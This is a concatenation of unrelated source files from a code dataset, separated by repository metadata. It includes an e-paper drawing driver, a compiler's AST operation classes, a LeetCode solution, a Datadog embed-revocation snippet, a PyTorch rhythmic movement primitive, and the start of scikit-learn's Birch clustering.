        final endpoint. Rewritten in the standard integer-error form.
        """
        dx = abs(x1 - x0)
        sx = 1 if x0 < x1 else -1
        dy = -abs(y1 - y0)
        sy = 1 if y0 < y1 else -1
        err = dx + dy
        while True:
            self.set_pixel(frame_buffer, x0, y0, colored)
            if x0 == x1 and y0 == y1:
                break
            e2 = 2 * err
            if e2 >= dy:
                err += dy
                x0 += sx
            if e2 <= dx:
                err += dx
                y0 += sy

    def draw_horizontal_line(self, frame_buffer, x, y, width, colored):
        """Draw a horizontal line of *width* pixels starting at (x, y)."""
        for i in range(x, x + width):
            self.set_pixel(frame_buffer, i, y, colored)

    def draw_vertical_line(self, frame_buffer, x, y, height, colored):
        """Draw a vertical line of *height* pixels starting at (x, y)."""
        for i in range(y, y + height):
            self.set_pixel(frame_buffer, x, i, colored)

    def draw_rectangle(self, frame_buffer, x0, y0, x1, y1, colored):
        """Draw the outline of the rectangle spanning the two corners."""
        min_x = x0 if x1 > x0 else x1
        max_x = x1 if x1 > x0 else x0
        min_y = y0 if y1 > y0 else y1
        max_y = y1 if y1 > y0 else y0
        self.draw_horizontal_line(frame_buffer, min_x, min_y, max_x - min_x + 1, colored)
        self.draw_horizontal_line(frame_buffer, min_x, max_y, max_x - min_x + 1, colored)
        self.draw_vertical_line(frame_buffer, min_x, min_y, max_y - min_y + 1, colored)
        self.draw_vertical_line(frame_buffer, max_x, min_y, max_y - min_y + 1, colored)

    def draw_filled_rectangle(self, frame_buffer, x0, y0, x1, y1, colored):
        """Draw a filled rectangle spanning the two corners."""
        min_x = x0 if x1 > x0 else x1
        max_x = x1 if x1 > x0 else x0
        min_y = y0 if y1 > y0 else y1
        max_y = y1 if y1 > y0 else y0
        for i in range(min_x, max_x + 1):
            self.draw_vertical_line(frame_buffer, i, min_y, max_y - min_y + 1, colored)

    def draw_circle(self, frame_buffer, x, y, radius, colored):
        """Draw a circle outline using the Bresenham midpoint algorithm."""
        x_pos = -radius
        y_pos = 0
        err = 2 - 2 * radius
        if x >= self.width or y >= self.height:
            return
        while True:
            # Plot one point in each quadrant per step.
            self.set_pixel(frame_buffer, x - x_pos, y + y_pos, colored)
            self.set_pixel(frame_buffer, x + x_pos, y + y_pos, colored)
            self.set_pixel(frame_buffer, x + x_pos, y - y_pos, colored)
            self.set_pixel(frame_buffer, x - x_pos, y - y_pos, colored)
            e2 = err
            if e2 <= y_pos:
                y_pos += 1
                err += y_pos * 2 + 1
                if -x_pos == y_pos and e2 <= x_pos:
                    e2 = 0
            if e2 > x_pos:
                x_pos += 1
                err += x_pos * 2 + 1
            if x_pos > 0:
                break

    def draw_filled_circle(self, frame_buffer, x, y, radius, colored):
        """Draw a filled circle using the Bresenham midpoint algorithm."""
        x_pos = -radius
        y_pos = 0
        err = 2 - 2 * radius
        if x >= self.width or y >= self.height:
            return
        while True:
            self.set_pixel(frame_buffer, x - x_pos, y + y_pos, colored)
            self.set_pixel(frame_buffer, x + x_pos, y + y_pos, colored)
            self.set_pixel(frame_buffer, x + x_pos, y - y_pos, colored)
            self.set_pixel(frame_buffer, x - x_pos, y - y_pos, colored)
            # Fill the span between the left and right quadrant points.
            self.draw_horizontal_line(frame_buffer, x + x_pos, y + y_pos, 2 * (-x_pos) + 1, colored)
            self.draw_horizontal_line(frame_buffer, x + x_pos, y - y_pos, 2 * (-x_pos) + 1, colored)
            e2 = err
            if e2 <= y_pos:
                y_pos += 1
                err += y_pos * 2 + 1
                if -x_pos == y_pos and e2 <= x_pos:
                    e2 = 0
            if e2 > x_pos:
                x_pos += 1
                err += x_pos * 2 + 1
            if x_pos > 0:
                break

    # to wake call reset() or init()
    def sleep(self):
        """Put the panel into its low-power state."""
        self._command(VCOM_AND_DATA_INTERVAL_SETTING, b'\x37')
        self._command(VCM_DC_SETTING_REGISTER, b'\x00')  # to solve Vcom drop
        self._command(POWER_SETTING, b'\x02\x00\x00\x00')  # gate switch to external
        self.wait_until_idle()
        self._command(POWER_OFF)
| 40.88746 | 130 | 0.566609 |
795c7aef00580472613173046e8e36975db6952f | 7,105 | py | Python | Proyecto/compilation/ast/operations.py | leynier/IA-Sim-Com | f6e99bb1aa4b02d5d558dc76a9bf802c3761e428 | [
"MIT"
] | null | null | null | Proyecto/compilation/ast/operations.py | leynier/IA-Sim-Com | f6e99bb1aa4b02d5d558dc76a9bf802c3761e428 | [
"MIT"
] | 1 | 2022-02-11T07:26:54.000Z | 2022-02-11T07:26:54.000Z | Proyecto/compilation/ast/operations.py | leynier/IA-Sim-Com | f6e99bb1aa4b02d5d558dc76a9bf802c3761e428 | [
"MIT"
] | null | null | null | from compilation.errors import Error, CheckTypesError
from compilation.ast.nodes import Node
from compilation.context import Context
def is_error(value: Error) -> bool:
    """Return True when *value* is a compilation Error instance."""
    return isinstance(value, Error)
def numbertype(type_):
    """Return True when *type_* names a numeric type ('int' or 'double').

    Bugfix: the original fell off the end and implicitly returned None for
    non-numeric types; an explicit bool is returned now, which is backward
    compatible in boolean context.
    """
    return type_ in ("int", "double")
def is_number(value) -> bool:
    """Return True for int or float values (note: bools count as ints)."""
    return isinstance(value, (int, float))
def is_bool(value: bool) -> bool:
    """Return True when *value* is exactly a bool (True or False)."""
    return value is True or value is False
def same_type(value_1, value_2) -> bool:
    """Return True when value_1 is an instance of value_2's class."""
    return isinstance(value_1, value_2.__class__)
class Op(Node):
    """Base class for unary operations over a single operand node."""

    def __init__(self, right_node: Node):
        self.right_node = right_node

    def eval(self, variables: dict):
        # Default evaluation is a no-op; concrete subclasses override this.
        return None

    def __repr__(self) -> str:
        return f"{self.type()}({self.right_node})"

    @staticmethod
    def type() -> str:
        return "OP"
class BinOp(Op):  # @@
    """Base class for binary operations over two operand nodes."""

    def __init__(self, left_node: Node, right_node: Node):
        super().__init__(right_node)
        self.left_node = left_node
        self.token = None  # set by the parser; used for error locations

    def validate(self, context: Context):
        """Validate both operands; propagate the first non-bool result."""
        # Both operands are validated eagerly (matching the original's
        # evaluation order) before any result is inspected.
        left_result = self.left_node.validate(context)
        right_result = self.right_node.validate(context)
        if not isinstance(left_result, bool):
            return left_result
        if not isinstance(right_result, bool):
            return right_result
        return True

    def checktype(self, context: Context):
        """Type-check both operands and compute the arithmetic result type."""
        left_type = self.left_node.checktype(context)
        right_type = self.right_node.checktype(context)
        if isinstance(left_type, CheckTypesError):
            return left_type
        if isinstance(right_type, CheckTypesError):
            return right_type
        if not (numbertype(left_type) and numbertype(right_type)):
            return CheckTypesError("You cannot operate arithmetically with tokens that are not of type number", "",
                                   self.token.line, self.token.column)
        # int only when both sides are int; any double promotes to double.
        return "int" if left_type == right_type == "int" else "double"

    def __repr__(self) -> str:
        return f"{self.type()}({self.left_node}, {self.right_node})"

    @staticmethod
    def type() -> str:
        return "BIN_OP"
class AddOp(BinOp):
    """Addition node: evaluates both operands and returns their sum."""

    def __init__(self, left_node: Node, right_node: Node):
        super().__init__(left_node, right_node)

    def eval(self, context: Context):
        left = self.left_node.eval(context)
        if isinstance(left, RuntimeError):
            return left
        right = self.right_node.eval(context)
        if isinstance(right, RuntimeError):
            return right
        return left + right

    @staticmethod
    def type() -> str:
        return "ADD"
class ArOp(BinOp):
    """Marker base class for arithmetic binary operations."""
    def __init__(self, left_node: Node, right_node: Node):
        super().__init__(left_node, right_node)
    @staticmethod
    def type() -> str:
        return "AR_OP"
class SubOp(ArOp):
    """Subtraction node: left operand minus right operand."""

    def __init__(self, left_node: Node, right_node: Node):
        super().__init__(left_node, right_node)

    def eval(self, context: Context):
        left = self.left_node.eval(context)
        if isinstance(left, RuntimeError):
            return left
        right = self.right_node.eval(context)
        if isinstance(right, RuntimeError):
            return right
        return left - right

    @staticmethod
    def type() -> str:
        return "SUB"
class MulOp(BinOp):
    """Multiplication node.

    NOTE(review): extends BinOp directly while SubOp/DivOp/ExpOp extend
    ArOp -- possibly intentional; confirm before relying on isinstance
    checks against ArOp.
    """

    def __init__(self, left_node: Node, right_node: Node):
        super().__init__(left_node, right_node)

    def eval(self, context: Context):
        left = self.left_node.eval(context)
        if isinstance(left, RuntimeError):
            return left
        right = self.right_node.eval(context)
        if isinstance(right, RuntimeError):
            return right
        return left * right

    @staticmethod
    def type() -> str:
        return "MUL"
class DivOp(ArOp):
    """Division node with an explicit division-by-zero runtime error."""

    def __init__(self, left_node: Node, right_node: Node):
        super().__init__(left_node, right_node)
        self.token = None  # set by the parser; used for error locations

    def eval(self, context: Context):
        # The right operand (divisor) is evaluated first, matching the
        # original evaluation order.
        divisor = self.right_node.eval(context)
        if isinstance(divisor, RuntimeError):
            return divisor
        dividend = self.left_node.eval(context)
        if isinstance(dividend, RuntimeError):
            return dividend
        if divisor == 0:
            return RuntimeError("division by zero", "", self.token.line, self.token.column)
        return dividend / divisor

    @staticmethod
    def type() -> str:
        return "DIV"
class ModOp(DivOp):
    """Modulo node with an explicit division-by-zero runtime error."""

    def __init__(self, left_node: Node, right_node: Node):
        super().__init__(left_node, right_node)
        self.token = None  # set by the parser; used for error locations

    def eval(self, context: Context):
        # Divisor first, then dividend -- matching the original order.
        divisor = self.right_node.eval(context)
        if isinstance(divisor, RuntimeError):
            return divisor
        dividend = self.left_node.eval(context)
        if isinstance(dividend, RuntimeError):
            return dividend
        if divisor == 0:
            return RuntimeError("division by zero", "", self.token.line, self.token.column)
        return dividend % divisor

    @staticmethod
    def type() -> str:
        return "MOD"
class ExpOp(ArOp):
    """Exponentiation node: left operand raised to the right operand."""

    def __init__(self, left_node: Node, right_node: Node):
        super().__init__(left_node, right_node)

    def eval(self, context: Context):
        base = self.left_node.eval(context)
        if isinstance(base, RuntimeError):
            return base
        exponent = self.right_node.eval(context)
        if isinstance(exponent, RuntimeError):
            return exponent
        return base ** exponent

    @staticmethod
    def type() -> str:
        return "EXP"
class BoolOp(BinOp):
    """Marker base class for boolean binary operations."""
    def __init__(self, left_node: Node, right_node: Node):
        super().__init__(left_node, right_node)
    @staticmethod
    def type() -> str:
        return "BOOL_OP"
class AndOp(BoolOp):
    """Logical-and node.

    Bugfix: eval previously returned ``self.left_node and self.right_node``
    -- the AST node objects themselves (always truthy) -- instead of
    evaluating the operands like every arithmetic op does.
    """

    def __init__(self, left_node: Node, right_node: Node):
        super().__init__(left_node, right_node)

    def eval(self, context: Context):
        left = self.left_node.eval(context)
        if isinstance(left, RuntimeError):
            return left
        right = self.right_node.eval(context)
        if isinstance(right, RuntimeError):
            return right
        return left and right

    @staticmethod
    def type() -> str:
        return "AND"
class OrOp(BoolOp):
    """Logical-or node.

    Bugfix: eval previously returned the AST node objects themselves
    (always truthy) instead of evaluating the operands.
    """

    def __init__(self, left_node: Node, right_node: Node):
        super().__init__(left_node, right_node)

    def eval(self, context: Context):
        left = self.left_node.eval(context)
        if isinstance(left, RuntimeError):
            return left
        right = self.right_node.eval(context)
        if isinstance(right, RuntimeError):
            return right
        return left or right

    @staticmethod
    def type() -> str:
        return "OR"
class XorOp(BoolOp):
    """Exclusive-or node.

    Bugfix: eval previously XOR-ed the AST node objects themselves instead
    of evaluating the operands first.
    """

    def __init__(self, left_node: Node, right_node: Node):
        super().__init__(left_node, right_node)

    def eval(self, context: Context):
        left = self.left_node.eval(context)
        if isinstance(left, RuntimeError):
            return left
        right = self.right_node.eval(context)
        if isinstance(right, RuntimeError):
            return right
        return left ^ right

    @staticmethod
    def type() -> str:
        return "XOR"
795c7af8c47f7bb298a1f427249732569a868fde | 296 | py | Python | Leetcode/0372. Super Pow/0372.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | Leetcode/0372. Super Pow/0372.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | Leetcode/0372. Super Pow/0372.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | class Solution:
def superPow(self, a: int, b: List[int]) -> int:
    """Compute a**b mod 1337, where b is given as a list of decimal digits.

    Uses the identity a^(10*x + d) = (a^x)^10 * a^d, folding one digit of
    the exponent per iteration with the built-in three-argument pow.
    """
    MOD = 1337
    result = 1
    for digit in b:
        result = pow(result, 10, MOD) * pow(a, digit, MOD) % MOD
    return result
| 18.5 | 50 | 0.486486 |
795c7cf365cf44fe50777f5bee588f0ba9626ed9 | 348 | py | Python | ja/code_snippets/api-embeds-revoke.py | quotecenter/documentation-1 | f365703264761aa2b19d5d1d8ec55a3a6082ef4d | [
"BSD-3-Clause"
] | null | null | null | ja/code_snippets/api-embeds-revoke.py | quotecenter/documentation-1 | f365703264761aa2b19d5d1d8ec55a3a6082ef4d | [
"BSD-3-Clause"
] | null | null | null | ja/code_snippets/api-embeds-revoke.py | quotecenter/documentation-1 | f365703264761aa2b19d5d1d8ec55a3a6082ef4d | [
"BSD-3-Clause"
] | null | null | null | from datadog import initialize, api
# Intialize request parameters including API/APP key
options = {
'api_key': '<YOUR_API_KEY>',
'app_key': '<YOUR_APP_KEY>'
}
initialize(**options)
# Set Embed ID (token)
embed_id = "5f585b01c81b12ecdf5f40df0382738d0919170639985d3df5e2fc4232865b0c"
# Call Embed API function
api.Embed.revoke(embed_id)
| 21.75 | 77 | 0.761494 |
795c7d38804abdd49d2b717f49aa1387e89d26d0 | 4,728 | py | Python | pyrobolearn/models/dmp/dmpytorch/rhythmic_dmp.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | [
"Apache-2.0"
] | 2 | 2021-01-21T21:08:30.000Z | 2022-03-29T16:45:49.000Z | pyrobolearn/models/dmp/dmpytorch/rhythmic_dmp.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | [
"Apache-2.0"
] | null | null | null | pyrobolearn/models/dmp/dmpytorch/rhythmic_dmp.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | [
"Apache-2.0"
] | 1 | 2020-09-29T21:25:39.000Z | 2020-09-29T21:25:39.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Define the rhythmic dynamic movement primitive.
"""
import numpy as np
import torch
from pyrobolearn.models.dmp.dmpytorch.canonical_systems import RhythmicCS
from pyrobolearn.models.dmp.dmpytorch.forcing_terms import RhythmicForcingTerm
from pyrobolearn.models.dmp.dmpytorch.dmp import DMP
__author__ = "Brian Delhaisse"
__copyright__ = "Copyright 2018, PyRoboLearn"
__credits__ = ["Brian Delhaisse"]
__license__ = "GNU GPLv3"
__version__ = "1.0.0"
__maintainer__ = "Brian Delhaisse"
__email__ = "briandelhaisse@gmail.com"
__status__ = "Development"
class RhythmicDMP(DMP):
r"""Rhythmic Dynamic Movement Primitive
Rhythmic DMPs have the same mathematical formulation as general DMPs, which is given by:
.. math:: \tau^2 \ddot{y} = K (g - y) - D \tau \dot{y} + f(s)
where :math:`\tau` is a scaling factor that allows to slow down or speed up the reproduced movement, :math:`K`
is the stiffness coefficient, :math:`D` is the damping coefficient, :math:`y, \dot{y}, \ddot{y}` are the position,
velocity, and acceleration of a DoF, and :math:`f(s)` is the non-linear forcing term.
However, the forcing term in the case of rhythmic DMPs is given by:
.. math:: f(s) = \frac{\sum_i \psi_i(s) w_i}{\sum_i \psi_i(s)} a
where :math:`w` are the learnable weight parameters, and :math:`\psi` are the basis functions evaluated at the
given input phase variable :math:`s`, and :math:`a` is the amplitude.
The basis functions (in the rhythmic case) are given by:
.. math:: \psi_i(s) = \exp \left( - h_i (\cos(s - c_i) - 1) \right)
where :math:`c_i` is the center of the basis, and :math:`h_i` is a measure of concentration.
Also, the canonical system associated with this transformation system is given by:
.. math:: \tau \dot{s} = 1
where :math:`\tau` is a scaling factor that allows to slow down or speed up the movement, and :math:`s` is the
phase variable that drives the DMP.
All these differential equations are solved using Euler's method.
References:
[1] "Dynamical movement primitives: Learning attractor models for motor behaviors", Ijspeert et al., 2013
"""
def __init__(self, num_dmps, num_basis, dt=0.01, y0=0, goal=1,
forces=None, stiffness=None, damping=None):
"""Initialize the rhythmic DMP
Args:
num_dmps (int): number of DMPs
num_basis (int): number of basis functions
dt (float): step integration for Euler's method
y0 (float, np.array): initial position(s)
goal (float, np.array): goal(s)
forces (list, ForcingTerm): the forcing terms (which can have different basis functions)
stiffness (float): stiffness coefficient
damping (float): damping coefficient
"""
# create rhythmic canonical system
cs = RhythmicCS(dt=dt)
# create forcing terms (each one contains the basis functions and learnable weights)
if forces is None:
if isinstance(num_basis, int):
forces = [RhythmicForcingTerm(cs, num_basis) for _ in range(num_dmps)]
else:
if not isinstance(num_basis, (np.ndarray, list, tuple, set)):
raise TypeError("Expecting 'num_basis' to be an int, list, tuple, np.array or set.")
if len(num_basis) != num_dmps:
raise ValueError("The length of th list of number of basis doesn't match the number of DMPs")
forces = [RhythmicForcingTerm(cs, n_basis) for n_basis in num_basis]
# call super class constructor
super(RhythmicDMP, self).__init__(canonical_system=cs, forces=forces, y0=y0, goal=goal,
stiffness=stiffness, damping=damping)
def get_scaling_term(self, new_goal=None):
"""
Return the scaling term for the forcing term. For rhythmic DMPs it's non-diminishing, so this function just
returns 1.
"""
return torch.ones(self.num_dmps)
def _generate_goal(self, y_des):
    """Generate the goal for path imitation.

    For rhythmic DMPs, the goal is the average of the desired trajectory;
    concretely it is taken as the midpoint between the minimum and maximum
    of each trajectory, ignoring NaN entries.

    Args:
        y_des (float[M,T]): the desired trajectory to follow (with shape [num_dmps, timesteps]).
            NOTE(review): assumed to be a torch tensor, since ``torch.isnan``
            and boolean-mask indexing are used below — confirm at call sites.

    Returns:
        float[M]: goal positions (one for each DMP)
    """
    goal = np.zeros(self.num_dmps)
    for n in range(self.num_dmps):
        num_idx = ~torch.isnan(y_des[n])  # ignore nan's when calculating goal
        # midpoint of the finite range of the n-th trajectory
        goal[n] = .5 * (y_des[n, num_idx].min() + y_des[n, num_idx].max())
    return goal
| 40.758621 | 118 | 0.648689 |
795c7d7f54ec0dc0adbbebaf28a5070c47bb922b | 25,555 | py | Python | sklearn/cluster/_birch.py | melkisedeath/scikit-learn | 74a37de119d2c7c9ea1cce673c2ee207541a55d2 | [
"BSD-3-Clause"
] | 3 | 2021-02-04T16:57:23.000Z | 2021-02-24T13:44:51.000Z | sklearn/cluster/_birch.py | melkisedeath/scikit-learn | 74a37de119d2c7c9ea1cce673c2ee207541a55d2 | [
"BSD-3-Clause"
] | null | null | null | sklearn/cluster/_birch.py | melkisedeath/scikit-learn | 74a37de119d2c7c9ea1cce673c2ee207541a55d2 | [
"BSD-3-Clause"
] | 1 | 2019-04-18T16:25:21.000Z | 2019-04-18T16:25:21.000Z | # Authors: Manoj Kumar <manojkumarsivaraj334@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Joel Nothman <joel.nothman@gmail.com>
# License: BSD 3 clause
import warnings
import numbers
import numpy as np
from scipy import sparse
from math import sqrt
from ..metrics import pairwise_distances_argmin
from ..metrics.pairwise import euclidean_distances
from ..base import TransformerMixin, ClusterMixin, BaseEstimator
from ..utils.extmath import row_norms
from ..utils import deprecated
from ..utils.validation import check_is_fitted, _deprecate_positional_args
from ..exceptions import ConvergenceWarning
from . import AgglomerativeClustering
from .._config import config_context
def _iterate_sparse_X(X):
"""This little hack returns a densified row when iterating over a sparse
matrix, instead of constructing a sparse matrix for every row that is
expensive.
"""
n_samples = X.shape[0]
X_indices = X.indices
X_data = X.data
X_indptr = X.indptr
for i in range(n_samples):
row = np.zeros(X.shape[1])
startptr, endptr = X_indptr[i], X_indptr[i + 1]
nonzero_indices = X_indices[startptr:endptr]
row[nonzero_indices] = X_data[startptr:endptr]
yield row
def _split_node(node, threshold, branching_factor):
    """The node has to be split if there is no place for a new subcluster
    in the node.
    1. Two empty nodes and two empty subclusters are initialized.
    2. The pair of distant subclusters are found.
    3. The properties of the empty subclusters and nodes are updated
       according to the nearest distance between the subclusters to the
       pair of distant subclusters.
    4. The two nodes are set as children to the two subclusters.

    Returns
    -------
    new_subcluster1, new_subcluster2 : _CFSubcluster
        The two subclusters that replace the split node's parent
        subcluster, each holding one of the two new nodes as its child.
    """
    new_subcluster1 = _CFSubcluster()
    new_subcluster2 = _CFSubcluster()
    new_node1 = _CFNode(
        threshold=threshold, branching_factor=branching_factor,
        is_leaf=node.is_leaf,
        n_features=node.n_features)
    new_node2 = _CFNode(
        threshold=threshold, branching_factor=branching_factor,
        is_leaf=node.is_leaf,
        n_features=node.n_features)
    new_subcluster1.child_ = new_node1
    new_subcluster2.child_ = new_node2

    # Splice the two new nodes into the doubly-linked list of leaves in
    # place of the node being split.
    if node.is_leaf:
        if node.prev_leaf_ is not None:
            node.prev_leaf_.next_leaf_ = new_node1
        new_node1.prev_leaf_ = node.prev_leaf_
        new_node1.next_leaf_ = new_node2
        new_node2.prev_leaf_ = new_node1
        new_node2.next_leaf_ = node.next_leaf_
        if node.next_leaf_ is not None:
            node.next_leaf_.prev_leaf_ = new_node2

    # Find the pair of most distant subclusters; they seed the two nodes.
    dist = euclidean_distances(
        node.centroids_, Y_norm_squared=node.squared_norm_, squared=True)
    n_clusters = dist.shape[0]

    farthest_idx = np.unravel_index(
        dist.argmax(), (n_clusters, n_clusters))
    node1_dist, node2_dist = dist[(farthest_idx,)]

    node1_closer = node1_dist < node2_dist
    # Make sure node1 is closest to itself even if all distances are equal.
    # This can only happen when all node.centroids_ are duplicates, making
    # every pairwise distance zero; without this line node1_closer would be
    # all-False, every subcluster would be assigned to node2, node1 would
    # stay empty, and the split would never make progress.
    node1_closer[farthest_idx[0]] = True

    # Assign each subcluster to whichever seed centroid it is closer to.
    for idx, subcluster in enumerate(node.subclusters_):
        if node1_closer[idx]:
            new_node1.append_subcluster(subcluster)
            new_subcluster1.update(subcluster)
        else:
            new_node2.append_subcluster(subcluster)
            new_subcluster2.update(subcluster)
    return new_subcluster1, new_subcluster2
class _CFNode:
    """Each node in a CFTree is called a CFNode.

    The CFNode can have a maximum of branching_factor
    number of CFSubclusters.

    Parameters
    ----------
    threshold : float
        Threshold needed for a new subcluster to enter a CFSubcluster.

    branching_factor : int
        Maximum number of CF subclusters in each node.

    is_leaf : bool
        We need to know if the CFNode is a leaf or not, in order to
        retrieve the final subclusters.

    n_features : int
        The number of features.

    Attributes
    ----------
    subclusters_ : list
        List of subclusters for a particular CFNode.

    prev_leaf_ : _CFNode
        Previous leaf in the linked list of leaves. Useful only if
        is_leaf is True.

    next_leaf_ : _CFNode
        Next leaf in the linked list of leaves. Useful only if
        is_leaf is True.

    init_centroids_ : ndarray of shape (branching_factor + 1, n_features)
        Manipulate ``init_centroids_`` throughout rather than centroids_ since
        the centroids are just a view of the ``init_centroids_``.

    init_sq_norm_ : ndarray of shape (branching_factor + 1,)
        manipulate init_sq_norm_ throughout. similar to ``init_centroids_``.

    centroids_ : ndarray of shape (branching_factor + 1, n_features)
        View of ``init_centroids_``.

    squared_norm_ : ndarray of shape (branching_factor + 1,)
        View of ``init_sq_norm_``.
    """
    def __init__(self, *, threshold, branching_factor, is_leaf, n_features):
        self.threshold = threshold
        self.branching_factor = branching_factor
        self.is_leaf = is_leaf
        self.n_features = n_features

        # The list of subclusters, centroids and squared norms
        # to manipulate throughout.
        self.subclusters_ = []
        # One slot beyond branching_factor so an overfull node can briefly
        # hold the subcluster that triggers a split.
        self.init_centroids_ = np.zeros((branching_factor + 1, n_features))
        self.init_sq_norm_ = np.zeros((branching_factor + 1))
        self.squared_norm_ = []
        self.prev_leaf_ = None
        self.next_leaf_ = None

    def append_subcluster(self, subcluster):
        """Add ``subcluster`` to this node and refresh the cached views."""
        n_samples = len(self.subclusters_)
        self.subclusters_.append(subcluster)
        self.init_centroids_[n_samples] = subcluster.centroid_
        self.init_sq_norm_[n_samples] = subcluster.sq_norm_

        # Keep centroids and squared norm as views. In this way
        # if we change init_centroids and init_sq_norm_, it is
        # sufficient,
        self.centroids_ = self.init_centroids_[:n_samples + 1, :]
        self.squared_norm_ = self.init_sq_norm_[:n_samples + 1]

    def update_split_subclusters(self, subcluster,
                                 new_subcluster1, new_subcluster2):
        """Remove a subcluster from a node and update it with the
        split subclusters.
        """
        ind = self.subclusters_.index(subcluster)
        self.subclusters_[ind] = new_subcluster1
        self.init_centroids_[ind] = new_subcluster1.centroid_
        self.init_sq_norm_[ind] = new_subcluster1.sq_norm_
        self.append_subcluster(new_subcluster2)

    def insert_cf_subcluster(self, subcluster):
        """Insert a new subcluster into the node.

        Returns True when this node has grown past ``branching_factor``
        and must itself be split by the caller; False otherwise.
        """
        if not self.subclusters_:
            self.append_subcluster(subcluster)
            return False

        threshold = self.threshold
        branching_factor = self.branching_factor
        # We need to find the closest subcluster among all the
        # subclusters so that we can insert our new subcluster.
        # This computes ||c||^2 - 2<c, x>, i.e. the squared distance up to
        # the constant ||x||^2 term, which does not affect the argmin.
        dist_matrix = np.dot(self.centroids_, subcluster.centroid_)
        dist_matrix *= -2.
        dist_matrix += self.squared_norm_
        closest_index = np.argmin(dist_matrix)
        closest_subcluster = self.subclusters_[closest_index]

        # If the subcluster has a child, we need a recursive strategy.
        if closest_subcluster.child_ is not None:
            split_child = closest_subcluster.child_.insert_cf_subcluster(
                subcluster)

            if not split_child:
                # If it is determined that the child need not be split, we
                # can just update the closest_subcluster
                closest_subcluster.update(subcluster)
                self.init_centroids_[closest_index] = \
                    self.subclusters_[closest_index].centroid_
                self.init_sq_norm_[closest_index] = \
                    self.subclusters_[closest_index].sq_norm_
                return False

            # things not too good. we need to redistribute the subclusters in
            # our child node, and add a new subcluster in the parent
            # subcluster to accommodate the new child.
            else:
                new_subcluster1, new_subcluster2 = _split_node(
                    closest_subcluster.child_, threshold, branching_factor)
                self.update_split_subclusters(
                    closest_subcluster, new_subcluster1, new_subcluster2)

                if len(self.subclusters_) > self.branching_factor:
                    return True
                return False

        # good to go!
        else:
            merged = closest_subcluster.merge_subcluster(
                subcluster, self.threshold)
            if merged:
                self.init_centroids_[closest_index] = \
                    closest_subcluster.centroid_
                self.init_sq_norm_[closest_index] = \
                    closest_subcluster.sq_norm_
                return False

            # not close to any other subclusters, and we still
            # have space, so add.
            elif len(self.subclusters_) < self.branching_factor:
                self.append_subcluster(subcluster)
                return False

            # We do not have enough space nor is it closer to an
            # other subcluster. We need to split.
            else:
                self.append_subcluster(subcluster)
                return True
class _CFSubcluster:
"""Each subcluster in a CFNode is called a CFSubcluster.
A CFSubcluster can have a CFNode has its child.
Parameters
----------
linear_sum : ndarray of shape (n_features,), default=None
Sample. This is kept optional to allow initialization of empty
subclusters.
Attributes
----------
n_samples_ : int
Number of samples that belong to each subcluster.
linear_sum_ : ndarray
Linear sum of all the samples in a subcluster. Prevents holding
all sample data in memory.
squared_sum_ : float
Sum of the squared l2 norms of all samples belonging to a subcluster.
centroid_ : ndarray of shape (branching_factor + 1, n_features)
Centroid of the subcluster. Prevent recomputing of centroids when
``CFNode.centroids_`` is called.
child_ : _CFNode
Child Node of the subcluster. Once a given _CFNode is set as the child
of the _CFNode, it is set to ``self.child_``.
sq_norm_ : ndarray of shape (branching_factor + 1,)
Squared norm of the subcluster. Used to prevent recomputing when
pairwise minimum distances are computed.
"""
def __init__(self, *, linear_sum=None):
if linear_sum is None:
self.n_samples_ = 0
self.squared_sum_ = 0.0
self.centroid_ = self.linear_sum_ = 0
else:
self.n_samples_ = 1
self.centroid_ = self.linear_sum_ = linear_sum
self.squared_sum_ = self.sq_norm_ = np.dot(
self.linear_sum_, self.linear_sum_)
self.child_ = None
def update(self, subcluster):
self.n_samples_ += subcluster.n_samples_
self.linear_sum_ += subcluster.linear_sum_
self.squared_sum_ += subcluster.squared_sum_
self.centroid_ = self.linear_sum_ / self.n_samples_
self.sq_norm_ = np.dot(self.centroid_, self.centroid_)
def merge_subcluster(self, nominee_cluster, threshold):
"""Check if a cluster is worthy enough to be merged. If
yes then merge.
"""
new_ss = self.squared_sum_ + nominee_cluster.squared_sum_
new_ls = self.linear_sum_ + nominee_cluster.linear_sum_
new_n = self.n_samples_ + nominee_cluster.n_samples_
new_centroid = (1 / new_n) * new_ls
new_sq_norm = np.dot(new_centroid, new_centroid)
# The squared radius of the cluster is defined:
# r^2 = sum_i ||x_i - c||^2 / n
# with x_i the n points assigned to the cluster and c its centroid:
# c = sum_i x_i / n
# This can be expanded to:
# r^2 = sum_i ||x_i||^2 / n - 2 < sum_i x_i / n, c> + n ||c||^2 / n
# and therefore simplifies to:
# r^2 = sum_i ||x_i||^2 / n - ||c||^2
sq_radius = new_ss / new_n - new_sq_norm
if sq_radius <= threshold ** 2:
(self.n_samples_, self.linear_sum_, self.squared_sum_,
self.centroid_, self.sq_norm_) = \
new_n, new_ls, new_ss, new_centroid, new_sq_norm
return True
return False
@property
def radius(self):
"""Return radius of the subcluster"""
# Because of numerical issues, this could become negative
sq_radius = self.squared_sum_ / self.n_samples_ - self.sq_norm_
return sqrt(max(0, sq_radius))
class Birch(ClusterMixin, TransformerMixin, BaseEstimator):
    """Implements the Birch clustering algorithm.

    It is a memory-efficient, online-learning algorithm provided as an
    alternative to :class:`MiniBatchKMeans`. It constructs a tree
    data structure with the cluster centroids being read off the leaf.
    These can be either the final cluster centroids or can be provided as input
    to another clustering algorithm such as :class:`AgglomerativeClustering`.

    Read more in the :ref:`User Guide <birch>`.

    .. versionadded:: 0.16

    Parameters
    ----------
    threshold : float, default=0.5
        The radius of the subcluster obtained by merging a new sample and the
        closest subcluster should be lesser than the threshold. Otherwise a new
        subcluster is started. Setting this value to be very low promotes
        splitting and vice-versa.

    branching_factor : int, default=50
        Maximum number of CF subclusters in each node. If a new sample enters
        such that the number of subclusters exceeds the branching_factor then
        that node is split into two nodes with the subclusters redistributed
